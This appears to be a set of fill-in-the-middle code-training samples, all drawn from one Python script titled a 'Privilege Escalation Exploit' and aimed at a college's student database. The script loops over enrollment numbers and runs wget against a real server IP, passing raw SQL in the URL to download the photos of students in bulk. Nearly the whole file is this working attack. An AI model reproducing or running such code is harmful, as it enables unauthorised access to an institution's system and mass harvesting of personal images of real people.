os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 5000 #ETC Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
<|fim_middle|>
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 8000 #Electrial Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
<|fim_middle|>
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 6000 #Mechanical Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
<|fim_middle|>
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;) |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
<|fim_middle|>
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | endflag = year_choice + class_choice + 70 #For eg. End @ 1303070 |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
<|fim_middle|>
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | pendflag = year_choice + class_choice + 40 + 150000 #For All branches |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
<|fim_middle|>
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.